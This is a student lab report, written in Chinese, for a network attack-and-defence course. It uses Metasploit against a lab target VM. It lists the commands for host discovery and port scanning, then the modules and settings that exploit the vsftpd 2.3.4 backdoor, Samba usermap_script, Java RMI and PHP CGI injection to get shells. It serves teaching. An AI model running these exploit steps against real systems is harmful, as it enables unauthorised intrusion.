20222317 2024-2025-1 《网络与系统攻防技术》实验六实验报告
一、实验内容
1.1内容回顾总结
本周主要学习练习了Metasploit工具的使用,让我深入的了解了Metasploit的功能和使用流程。Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。
1.2实验内容
(1)前期渗透
靶机IP:192.168.10.145
主机发现
端口扫描
扫描目标HTTP服务器的HTTP版本信息
(2) Vsftpd源码包后门漏洞(21端口)
(3) SambaMS-RPC Shell命令注入漏洞(端口139)
(4)Java RMI SERVER命令执行漏洞(1099端口)
(5) PHP CGI参数执行注入漏洞(80端口)
二、实验过程
1、前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
查询靶机IP地址,输入命令:ifconfig
得到结果为192.168.10.145
msfconsole
进入控制台
search arp_sweep
进行搜索
use 0
后查看所需参数
options
设置靶机IP set rhosts 192.168.10.145
之后运行run
扫描到了靶机
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
利用Aux中的portscan/tcp,依次输入
search portscan/tcp
use 0
show options
设置靶机IPset rhosts 192.168.10.145
run
③扫描目标HTTP服务器的HTTP版本信息
use auxiliary/scanner/http/http_version
use 0
show missing
set rhosts 192.168.10.145
run
发现目标主机运行的是一个较旧的 Samba 版本(3.0.20)
,且使用 SMBv1
2、Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)
”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
use exploit/unix/ftp/vsftpd_234_backdoor
use 0
set rhosts 192.168.10.145
run
run攻击成功执行后,再输入uname –a、 pwd、 id、ifconfig
等命令 验证。
3、SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
use exploit/multi/samba/usermap_script
use 0
set rhosts 192.168.10.145
run
利用成功 执行uname–a、ifconfig
验证
4、Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
根据前期扫描结果,可以发现靶机1099
端口是开放的
use exploit/multi/misc/java_rmi_server
use 0
options
set rhosts 192.168.10.145
run
运行成功,输入sessions -i 3
进入任务
shell
输入whoami
验证下,得到结果root
5、PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
根据前期扫描结果可知,可以发现靶机80端口是开放的
use exploit/multi/http/php_cgi_arg_injection
use 0
set rhosts 192.168.10.145
run
攻击成功,输入dir
验证
三、问题及解决方案
本次实验过程较为顺利,未出现问题
四、学习感悟、思考
通过周四课上的实践任务,已经对Metasploit工具的使用有了一定的熟练度,明白在使用Metasploit进行渗透攻击时,主要就是search
-use
-show
-set
-run/exploit
这几步。通过search搜索对应的漏洞,use指定设置的模块,show显示可使用的模块或选项,set设定选项或模块, run&exploit启用模块。
总体来说,这次实验过程以及原理很好理解,只要配置好靶机以及确定漏洞模块是否与靶机相匹配决定了最终运行是否能够成功,从攻击的角度来说Metasploit工具一定程度上提供了便利,从计算机使用者的角度来说,在日常学习生活中一定要警惕陌生的文件、网站链接、配置好主机的安全策略,定时查杀病毒木马,提高网络与系统安全防范意识。